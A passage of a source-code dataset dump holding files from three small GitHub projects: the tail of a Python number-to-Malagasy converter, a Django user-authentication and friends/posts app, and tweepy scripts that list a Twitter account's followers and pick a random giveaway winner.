'aotra', 'roa']) -> 'roa amby roa arivo' (not 'roa sy roa arivo')\n combine(['roanjato', 'aotra', 'roa']) -> 'roa amby roanjato' (not 'roa sy roa arivo')\n combine(['roanjato', 'roapolo', 'aotra']) -> 'roapolo sy roanjato' (not 'roapolo amby roanjato')\n exceptions:\n 'sy zato' -> 'amby zato'\n 'amby sy x arivo' -> 'amby x arivo' (e.g taona roa amby roa arivo) (when len(digit_words) == 4)\n \"\"\"\n if len(digit_words) == 1:\n phrase = digit_words[0]\n elif len(digit_words) == 2:\n phrase = ''\n if digit_words[0] != '':\n phrase = combine_reverse(digit_words[1:]) + ' ' + digit_words[0] + ' amby'\n else:\n phrase = combine_reverse(digit_words[1:])\n return phrase\n elif len(digit_words) > 2:\n if digit_words[-1] != '':\n if not all(p == '' for p in digit_words[1:-1]):\n phrase = digit_words[-1] + ' sy ' + combine_reverse(digit_words[:-1])\n elif all(p == '' for p in digit_words[1:-1]):\n phrase = digit_words[-1] + ' ' + combine_reverse(digit_words[:-1])\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) == 4:\n phrase = digit_words[-1] + ' ' + combine_reverse(digit_words[:-1])\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) > 4:\n phrase = digit_words[-1] + ' sy ' + combine_reverse(digit_words[:-1])\n elif digit_words[-1] == '':\n phrase = combine_reverse(digit_words[:-1])\n phrase = phrase.replace(' ', ' ')\n phrase = phrase.replace('amby ', 'amby')\n phrase = phrase.replace('iray amby', 'iraika amby')\n return phrase\n\ndef write_in_malagasy(number):\n \"\"\" main function \"\"\"\n return combine(digit_to_word(number)), combine_reverse(digit_to_word(number))\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) > 1:\n words1, words2 = write_in_malagasy(int(sys.argv[1]))\n print(\"Version 1: \", words1 + '\\n' + \"Version 2: \", words2)\n print(digit_to_word(int(sys.argv[1])))\n" }, { "alpha_fraction": 0.7678571343421936, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 27, "blob_id": "79d44527520500c3b998694315337597bffc6832", "content_id": "fe1f94fcda06d2ad5024ff77f8ecf297b13264ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/bin/number2malagasy", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nfrom number2malagasy import main\n" }, { "alpha_fraction": 0.6491228342056274, "alphanum_fraction": 0.6798245906829834, "avg_line_length": 44.599998474121094, "blob_id": "c4dce0bf4152b1baa52ebf14989d8c82cbe9a3b9", "content_id": "12872c02ee6f9758bbf455e221e41a1c957fa5d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 228, "license_type": "no_license", "max_line_length": 172, "num_lines": 5, "path": "/tests/test.py", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "import pytest\nfrom number2malagasy import\n\ndef (self):\n self.assertEqual(soratra_par_marika(980123), ['telo','roapolo','zato','','valo alina','sivy hetsy'], \"Should be ['telo','roapolo','zato','','valo alina','sivy hetsy']\")\n" }, { "alpha_fraction": 0.8214285969734192, "alphanum_fraction": 0.8392857313156128, "avg_line_length": 27, "blob_id": "c81fd1fd5831c349a4f43c126ee0f03097a2e651", "content_id": "560cde00de0b5bb4d970194fb7e7727f190e856d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 37, "num_lines": 2, "path": "/README.md", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "# number2malagasy\nconvert a number into Malagasy phrase\n" } ]
4
mjayant/AuthenticationSystem
https://github.com/mjayant/AuthenticationSystem
f03b596c830a3bf3bf19218eca165046ba592f1b
e186f767c989b39d93a49cfa996d18ec78950792
2f074054913d3ee1eaa9efb181cee52c3e238b84
refs/heads/master
2020-12-25T18:52:33.317231
2017-06-27T15:01:55
2017-06-27T15:01:55
94,004,462
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 39.588233947753906, "blob_id": "17ef42ed4d3a22ce2790c9f579f5f346e641b712", "content_id": "f00d6617bd3d13cc4f56dd436d38a0abf1558586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "no_license", "max_line_length": 76, "num_lines": 17, "path": "/auehentication_system/auehentication_system/urls.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom .views import redirect_login\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'auehentication_system.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', redirect_login, name='redirect_login'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^auth_sys/', include('autehntication_app.urls')),\n url(r'^post/', include('post_app.urls')),\n #url(r'^accounts/profile/$',views.view_profile, name='view_profile'),\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)" }, { "alpha_fraction": 0.7045977115631104, "alphanum_fraction": 0.7045977115631104, "avg_line_length": 35.29166793823242, "blob_id": "046bdf0442185595c3c92eb3483ad906ce2882e4", "content_id": "b7398830486e4c958d10bb444ee0e482a2aafb82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 140, "num_lines": 24, "path": "/auehentication_system/autehntication_app/middleware.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "import re\nfrom django.conf import settings\nfrom django.shortcuts import redirect\n\n\nurl_complie_regex = [re.compile(url) for url in settings.ALLOW_URLS]\nclass LoginMiddleware(object):\n\t\"\"\"\n\t\"\"\"\n\tdef process_view(self, request, view_func, view_args, view_kwargs):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\t#import pdb ;pdb.set_trace()\n\t\tprint request.path\n\t\tprint request.path.lstrip('/').rstrip('/')\n\t\t#import pdb ;pdb.set_trace()\n\t\tif not request.user.is_authenticated() and request.path.lstrip('/').rstrip('/') == 'auth_sys/forgotpassword':\n\t\t\treturn None\n\t\telif not request.user.is_authenticated() and not any( [item.match(request.path.lstrip('/').rstrip('/')) for item in url_complie_regex]):\n\t\t\treturn redirect(settings.LOGIN_URL)\n\t\telif request.user.is_authenticated() and any( item.match(request.path) for item in url_complie_regex):\n\t\t\treturn redirect('/auth_sys/')\n\t\telse:\n\t\t\treturn None" }, { "alpha_fraction": 0.6280276775360107, "alphanum_fraction": 0.6280276775360107, "avg_line_length": 27.950000762939453, "blob_id": "79f933f1b754d9b0f460ac926d7cff938379ee1e", "content_id": "9480e882e0f4ddefc33a12d264ad8ca9b271f446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 97, "num_lines": 20, "path": "/auehentication_system/post_app/urls.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom .views import HomeTemplate\nfrom . import views\n# from django.contrib.auth.views import (login, \n# logout ,\n# password_reset,\n# password_reset_done,\n# password_reset_confirm,\n# password_reset_complete,\n# )\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'auehentication_system.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', HomeTemplate.as_view(), name='home'),\n url(r'^connect/(?P<operation>.+)/(?P<pk>\\d+)/$', views.change_friends, name='change_friends')\n\n ]" }, { "alpha_fraction": 0.6794094443321228, "alphanum_fraction": 0.6802003979682922, "avg_line_length": 28.850393295288086, "blob_id": "c59e249c1d147d41e9fa4075f69bb9d64ee06748", "content_id": "3bbd9932c0758cf8047f401ff2c55d457cfa87a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3793, "license_type": "no_license", "max_line_length": 112, "num_lines": 127, "path": "/auehentication_system/autehntication_app/views.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm, AuthenticationForm\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm, UserProfileForm\nfrom .models import UserProfile\nfrom django.contrib import messages\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.forms import inlineformset_factory\nfrom django.contrib.auth.models import User\n\n# Create your views here.\n\n\n# def home(request):\n# \t\"\"\"\n# \t\"\"\"\n# \treturn render(request, 'home.html', {})\n\n# def login(request):\n# \t\"\"\"\n# \t\"\"\"\n# \tform = AuthenticationForm(request.POST or None)\n# \tcontext = {}\n# \tcontext['form'] = form\n# \tif request.method == 'POST':\n# \t\t#import pdb ;pdb.set_trace()\n# \t\tif form.is_valid():\n# \t\t\tinstance = form.save(commit=False)\n# \t\t\tinstance.save()\n# \t\t\treturn redirect('/auth_sys')\n# \t\t# else:\n# \t\t# \tmessages.error(request, \"Error\")\n# \telse:\n\n# \t\tif request.user.is_authenticated():\n# \t\t\tredirect('/auth_sys')\n\n# \treturn render(request, 'login.html', context)\n\ndef register(request):\n\t\"\"\"\n\t\"\"\"\n\tform = CustomUserCreationForm(request.POST or None, request.FILES or None)\n\tcontext = {}\n\tcontext['form'] = form\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\treturn redirect(reverse('login'))\n\telse:\n\t\tmessages.error(request, \"Error\")\n\n\treturn render(request, 'register.html', context)\n\n\n#@login_required\ndef view_profile(request, pk=None):\n\t\"\"\"\n\t\"\"\"\n\t#import pdb ;pdb.set_trace()\n\tif pk:\n\t\tuser = User.objects.get(pk=pk)\n\t\n\telse:\n\t\tuser = request.user\n\tif request.method == 'POST':\n\t\treturn redirect(reverse('edit_profilee'))\n\t\t#return redirect('/auth_sys/editprofile')\n\treturn render(request, 'view_profile.html',{'user':user})\n\n#@login_required\ndef edit_profile(request):\n \"\"\"\n \"\"\"\n user_form = CustomUserChangeForm(instance=request.user)\n ProfileInlineFormSet = inlineformset_factory(User, UserProfile, fields=('website','city'), can_delete=False)\n formset = ProfileInlineFormSet(instance=request.user)\n context = {}\n #import pdb ;pdb.set_trace()\n if request.method == 'POST':\n user_form = CustomUserChangeForm(request.POST, request.FILES, instance=request.user)\n formset = ProfileInlineFormSet(request.POST, request.FILES, instance=request.user) \n if user_form.is_valid():\n created_user = user_form.save(commit=False)\n formset = ProfileInlineFormSet(request.POST, request.FILES, instance=created_user)\n \n if formset.is_valid():\n created_user.save()\n formset.save()\n return redirect(reverse('view_profile'))\n else:\n messages.error(request, \"Error\")\n \n\n context['user_form'] = user_form\n context['formset'] = formset\n # else:\n # form = CustomUserChangeForm(instance=request.user)\n # context['form'] = form\n # profile = UserProfile.objects.create(user=request.user)\n # form1 = UserProfileForm(instance=profile)\n # context['form1'] = form1\n\n return render(request, 'edit_profilee.html',context)\n\n#@login_required\ndef changePassword(request):\n\t\"\"\"\n\t\"\"\"\n\tcontext = {}\n\tif request.method == 'POST':\n\t\tform = PasswordChangeForm(data=request.POST, user=request.user)\n\t\tcontext['form'] = form\n\t\tif form.is_valid():\n\t\t\tinstance = form.save(commit=False)\n\t\t\tinstance.save()\n\t\t\tupdate_session_auth_hash(request, form.user)\n\t\t\treturn redirect(reverse('view_profile'))\n\t\t\t#return redirect('/auth_sys/viewprofile')\n\t\telse:\n\t\t\tmessages.error(request, \"Error\")\n\telse:\n\t\tform = PasswordChangeForm(user=request.user)\n\t\tcontext['form'] = form\n\n\treturn render(request, 'password_change.html',context)\n\n\n" }, { "alpha_fraction": 0.6022944450378418, "alphanum_fraction": 0.6347992420196533, "avg_line_length": 26.526315689086914, "blob_id": "a2a175d6fad2cda4d9da001d5c26cb4cf23b2872", "content_id": "040cbe4f93441e5bb9b529a301a1a19fffd4d6cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 158, "num_lines": 19, "path": "/auehentication_system/autehntication_app/migrations/0003_userprofile_image.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('autehntication_app', '0002_auto_20170617_1204'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='image',\n field=models.ImageField(upload_to=b'C:\\\\Users\\\\jaymishr\\\\DjangoProject\\\\AuthenticationSystem\\\\auehentication_system\\\\static\\\\images', blank=True),\n ),\n ]\n" }, { "alpha_fraction": 0.6835442781448364, "alphanum_fraction": 0.6835442781448364, "avg_line_length": 23.45070457458496, "blob_id": "52be12ef8cfa9993121ef71030c42d944eaa7967", "content_id": "3b178dd275ba71895c279355faf693c2062ae324", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1738, "license_type": "no_license", "max_line_length": 62, "num_lines": 71, "path": "/auehentication_system/post_app/views.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\nfrom .forms import PostForm\nfrom .models import Post, Friend\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\n\nclass HomeTemplate(TemplateView):\n\t\"\"\"\n\t\"\"\"\n\n\tdef get(self, request):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tcontext = {}\n\t\tcontext['form'] = PostForm()\n\t\tpost_data = Post.objects.all().order_by('-created')\n\t\tcontext['post_data'] = post_data\n\t\tuser_lst = User.objects.all().exclude(id=request.user.id)\n\n\t\ttry:\n\t\t\tfriend_id = Friend.objects.get(current_user=request.user)\n\t\t\tfriends = friend_id.users.all()\n\t\texcept Friend.DoesNotExist:\n\t\t\tfriends = set()\n\n\t\tcontext['friends'] = friends\n\n\t\tuser_lst = set(user_lst) - set(friends)\n\t\tcontext['user_lst'] = user_lst\n\t\treturn render(request, 'home.html', context)\n\n\tdef post(self, request):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tform = PostForm(request.POST or None, request.FILES or None)\n\t\t#form = myForm(request.POST or None, request.FILES or None)\n\t\ttext = ''\n\t\tcontext = {'form':form}\n\t\t#import pdb ;pdb.set_trace()\n\t\tif form.is_valid():\n\t\t\ttext = form.cleaned_data['post']\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.user = request.user\n\t\t\t#import pdb ;pdb.set_trace()\n\t\t\tpost.save()\n\t\t\t\n\t\t\treturn redirect(reverse('home'))\n\n\t\t\t#return reverse('home')\n\t\t# else:\n\t\t# \tmessages.error(request, \"Error\")\n\t\t\n\t\treturn render(request,'home.html', context)\n\n\ndef change_friends(request, operation, pk):\n\t\"\"\"\n\t\"\"\"\n\tif operation == 'add':\n\t\tfriend = User.objects.get(pk=pk)\n\t\tFriend.make_friend(request.user, friend)\n\telse:\n\n\t\tfriend = User.objects.get(pk=pk)\n\t\tFriend.lose_friend(request.user, friend)\n\treturn redirect(reverse('home'))\t\n\n" }, { "alpha_fraction": 0.6501064300537109, "alphanum_fraction": 0.6600425839424133, "avg_line_length": 47.55172348022461, "blob_id": "5f892471c42610b498008e6a280e5604296338bd", "content_id": "09b88dac18628c6d4ae6936a7a513b1455396c18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1409, "license_type": "no_license", "max_line_length": 164, "num_lines": 29, "path": "/auehentication_system/autehntication_app/urls.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom . import views\nfrom django.contrib.auth.views import (login, \n logout ,\n password_reset,\n password_reset_done,\n password_reset_confirm,\n password_reset_complete,\n )\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'auehentication_system.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n #url(r'^$', views.home, name='home'),\n url(r'^login/$', login, {'template_name':'login.html'}, name='login'),\n url(r'^logout/$', logout, {'template_name': 'logout.html'}, name='logout'),\n url(r'^register/$',views.register, name='register'),\n url(r'^viewprofile/$',views.view_profile, name='view_profile'),\n url(r'^viewprofile/(?P<pk>\\d+)/$',views.view_profile, name='view_profile_with_pk'),\n url(r'^editprofile/$',views.edit_profile, name='edit_profilee'),\n url(r'^editprofile/password/$',views.changePassword, name='changePassword'),\n url(r'^forgotpassword/$',password_reset, {'template_name': 'password_reset_form.html'}, name='forgotpassword'),\n url(r'^forgotpassword/done$',password_reset_done, name='password_reset_done'),\n url(r'^passwordresetconfirm/(?P<uidb64>[0-9A-Za-z_\\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})$',password_reset_confirm, name='password_reset_confirm'),\n url(r'^passwordresetconfirm/complete$',password_reset_complete, name='password_reset_complete'), \n\n]\n\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 16.88888931274414, "blob_id": "2605b71fd284fc86948a1b6aef3966c6d86a4725", "content_id": "8aca8a6cd39130507eeae05089b4b495c8e16850", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 45, "num_lines": 9, "path": "/auehentication_system/auehentication_system/views.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\n\n\ndef redirect_login(request):\n\t\"\"\"\n\t\"\"\"\n\t\n\treturn redirect('/auth_sys/login')\n" }, { "alpha_fraction": 0.6478067636489868, "alphanum_fraction": 0.65479975938797, "avg_line_length": 25.21666717529297, "blob_id": "e9ca7b402f2cfb5a800ea76ef2424905df3af6a2", "content_id": "422475b717b5619f908c79036050bc130e123b79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1573, "license_type": "no_license", "max_line_length": 75, "num_lines": 60, "path": "/auehentication_system/post_app/models.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime \n#from django.db.models.signals import post_save\nfrom django.conf import settings\n\nclass Post(models.Model):\n\t\"\"\"\n\t\"\"\"\n\n\tpost = models.TextField(max_length=100, blank=False)\n\tuser = models.ForeignKey(User, default=1)\n\tcreated = models.DateTimeField(auto_now_add=True)\n\tupdated = models.DateTimeField(auto_now=True)\n\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\treturn self.user.username\n\n\nclass Publication(models.Model):\n title = models.CharField(max_length=30)\n\n def __str__(self): # __unicode__ on Python 2\n return self.title\n\n class Meta:\n ordering = ('title',)\n\nclass Article(models.Model):\n headline = models.CharField(max_length=100)\n publications = models.ManyToManyField(Publication)\n\n def __str__(self): # __unicode__ on Python 2\n return self.headline\n\n class Meta:\n ordering = ('headline',)\n\n\nclass Friend(models.Model):\n users = models.ManyToManyField(User)\n current_user = models.ForeignKey(User, related_name='owner', null=True)\n\n @classmethod\n def make_friend(cls, current_user, new_friend):\n friend, created = cls.objects.get_or_create(\n current_user=current_user\n )\n friend.users.add(new_friend)\n\n @classmethod\n def lose_friend(cls, current_user, new_friend):\n \t#import pdb ;pdb.set_trace()\n friend, created = cls.objects.get_or_create(\n current_user=current_user\n )\n friend.users.remove(new_friend)\n" }, { "alpha_fraction": 0.6579973697662354, "alphanum_fraction": 0.6579973697662354, "avg_line_length": 16.9069766998291, "blob_id": "f428881267f25e9f9ee72627ad2c2884c85b6438", "content_id": "29e54d88720c4921c648ee172acc045bc7b364b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 769, "license_type": "no_license", "max_line_length": 70, "num_lines": 43, "path": "/auehentication_system/autehntication_app/forms.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom .models import UserProfile\n\nclass CustomUserCreationForm(UserCreationForm):\n\t\"\"\"\n\t\"\"\"\n\temail = forms.EmailField(required=True)\n\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = (\n\t\t\t\t\t'username',\n\t\t\t\t\t'first_name',\n\t\t\t\t\t'last_name',\n\t\t\t\t\t'email',\n\t\t\t\t\t'password1',\n\t\t\t\t\t'password2'\n\t\t)\n\n\nclass CustomUserChangeForm(UserChangeForm):\n\t\"\"\"\n\t\"\"\"\n\t#email = forms.EmailField(required=True)\n\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = (\n\t\t\t\t\t'username',\n\t\t\t\t\t'first_name',\n\t\t\t\t\t'last_name',\n\t\t\t\t\t'email',\n\t\t\t\t\t'password',\n\n\t\t)\n\n\nclass UserProfileForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ('website', 'city', 'image')" }, { "alpha_fraction": 0.7240437269210815, "alphanum_fraction": 0.7349726557731628, "avg_line_length": 24.275861740112305, "blob_id": "151033e8a24a69da5fe7ed5a9c273625ac32bfff", "content_id": "085359a4833a9f19f3b9d566ffef4976f35c3240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 732, "license_type": "no_license", "max_line_length": 85, "num_lines": 29, "path": "/auehentication_system/autehntication_app/models.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.conf import settings\n\nclass UserProfile(models.Model):\n\t\"\"\"\n\t\"\"\"\n\tuser = models.OneToOneField(User)\n\tdescription = models.CharField(max_length=100)\n\twebsite = models.URLField()\n\tbirth_date = models.DateField(auto_now_add=True)\n\tcity = models.CharField(max_length=50)\n\timage = models.ImageField(upload_to=settings.MEDIA_ROOT, blank=True, max_length=500)\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\treturn self.user.username\n\n\ndef save_profile(sender, **kwargs):\n\t\"\"\"\n\t\"\"\"\n\tif kwargs['created']:\n\t\tuser_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(save_profile, sender=User)" }, { "alpha_fraction": 0.5372596383094788, "alphanum_fraction": 0.6033653616905212, "avg_line_length": 28.714284896850586, "blob_id": "75c46c19cf450e986b600b6f2d648ae35eb56e9c", "content_id": "6df4793094f0f83ebf434ec6dc476a4c065c8df1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 130, "num_lines": 28, "path": "/auehentication_system/post_app/migrations/0003_auto_20170626_1801.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('post_app', '0002_auto_20170626_1756'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='post',\n name='created',\n field=models.DateTimeField(default=datetime.datetime(2017, 6, 26, 12, 31, 21, 978000, tzinfo=utc), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='post',\n name='updated',\n field=models.DateTimeField(default=datetime.datetime(2017, 6, 26, 12, 31, 32, 335000, tzinfo=utc), auto_now=True),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.7095435857772827, "alphanum_fraction": 0.7095435857772827, "avg_line_length": 20.81818199157715, "blob_id": "c5f8201f316763f2b40701e066dffcfd8d199096", "content_id": "00bed7dc650045448258e44929dc2e047b352f92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 103, "num_lines": 11, "path": "/auehentication_system/post_app/forms.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Post\n\n\nclass PostForm(forms.ModelForm):\n\n\tpost = forms.CharField(required=True, widget=forms.TextInput(attrs={'placeholder': 'Write Post....'}))\n\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = ('post',)\n\n" } ]
13
stefanesser/twitter_giveaway_2016
https://github.com/stefanesser/twitter_giveaway_2016
5035b0626c3f6b4d71f7b9714af75dbca880ff1a
bf203b8b39b839a98c18bd3d9fa246a20a4e1519
5267f67704d5022996af7433b545832e9f2a4263
refs/heads/master
2021-01-12T06:10:53.513957
2016-12-25T12:18:21
2016-12-25T12:18:21
77,324,409
10
1
null
null
null
null
null
[ { "alpha_fraction": 0.7136363387107849, "alphanum_fraction": 0.7136363387107849, "avg_line_length": 53.5, "blob_id": "41ed4022b721928a72775deb7ed93c43238611da", "content_id": "ddf8667b3a007df67b6c40df232f1bba41ef50d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 58, "num_lines": 4, "path": "/keys.py", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "\nCONSUMER_KEY = \"get from https://apps.twitter.com/\"\nCONSUMER_SECRET = \"get from https://apps.twitter.com/\"\nACCESS_TOKEN = \"get from https://apps.twitter.com/\"\nACCESS_TOKEN_SECRET = \"get from https://apps.twitter.com/\"\n\n" }, { "alpha_fraction": 0.772857129573822, "alphanum_fraction": 0.7928571701049805, "avg_line_length": 62.54545593261719, "blob_id": "115c9e795a691d33451ed1bdf472f7b898793ba3", "content_id": "d1032dd0bc57534286a9dab7070b958d01bea9ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 700, "license_type": "no_license", "max_line_length": 150, "num_lines": 11, "path": "/README.md", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "These scripts were used in the @i0n1c AppleTV 4 giveaway on 2016/12/25.\n\nFeel free to use these scripts for whatever you want they are \nmostly based on the examples from the tweepy documentation.\nThat being said you need to have tweepy installed for these scripts\nto work. Furthermore you need to fill in keys.py with API keys that\nyou get at https://apps.twitter.com/\n\n1. the more followers you have the longer the list generation takes due to twitter rate limits\n2. selecting among all followers is a bad way to do a giveaway (private accounts, inactive users, fake followers, company profiles following you, ...)\n3. for next giveaway better to select among active followers detected via retweets\n\n" }, { "alpha_fraction": 0.6980262994766235, "alphanum_fraction": 0.7013157606124878, "avg_line_length": 35.21428680419922, "blob_id": "d61780416ebef7b4bbb29fed5827ba62366599b1", "content_id": "e086b5388c8ebf247016352e567200d4c950d599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 101, "num_lines": 42, "path": "/pickRandomFollower.py", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "# feel free to use this code for whatever you want\n# it is mostly based on small code snippets that demonstrate the usage of tweepy\n# purpose of this script is to read twitter follower ids from a pickled file\n# once loaded the script will randomly choose one follower and print out:\n# name, profile url, follower count, friends count and statuses count\n# WARNING: selected numbers are from 0 to X\n\nimport sys\nimport tweepy\nimport pickle\n\nimport keys\nimport random\n\ntry:\n auth = tweepy.OAuthHandler(keys.CONSUMER_KEY, keys.CONSUMER_SECRET)\n auth.set_access_token(keys.ACCESS_TOKEN, keys.ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n \n rnd = random.SystemRandom()\n \n pkl_file = open('follower.pkl', 'rb')\n\n ids = pickle.load(pkl_file)\n \n page = rnd.randint(0, len(ids)-1)\n entry = rnd.randint(0, len(ids[page])-1)\n \n print \"randomly selecting page %u of %u pages\" % (page, len(ids))\n print \"randomly selecting entry %u of %u entries in page %u\" % (entry, len(ids[page]), page)\n \n user = api.get_user(user_id=ids[page][entry])\n print \"randomly selected user is: %s\" % user.screen_name\n print \"URL to this user: https://www.twitter.com/%s\" % user.screen_name\n print \"Followers: %u\" % user.followers_count\n print \"Friends: %u\" % user.friends_count\n print \"Statuses: %u\" % user.statuses_count\n\nexcept tweepy.TweepError:\n print tweepy.TweepError.message\nexcept:\n print sys.exc_info()" }, { "alpha_fraction": 0.6902573704719543, "alphanum_fraction": 0.6957720518112183, "avg_line_length": 31, "blob_id": "5710339c218d65f5ee8b073000cac29d3f76f5c8", "content_id": "9e34a9e5e5401bd547ce597d9f6f230472ce1324", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 101, "num_lines": 34, "path": "/followerList.py", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "# feel free to use this code for whatever you want\n# it is mostly based on small code snippets that demonstrate the usage of tweepy\n# purpose of this script is to enumerate all follower ids of 'i0n1c' and\n# then pickle them into a file\n# WARNING: sometimes strange TweepError exceptions are thrown at the very end\n\nimport sys\nimport tweepy\nimport pickle\n\nimport keys\n\ntry:\n auth = tweepy.OAuthHandler(keys.CONSUMER_KEY, keys.CONSUMER_SECRET)\n auth.set_access_token(keys.ACCESS_TOKEN, keys.ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n \n follower_cursor = tweepy.Cursor(api.followers_ids, id = \"i0n1c\")\n print \"type[follower_cursor]=\", type(follower_cursor)\n 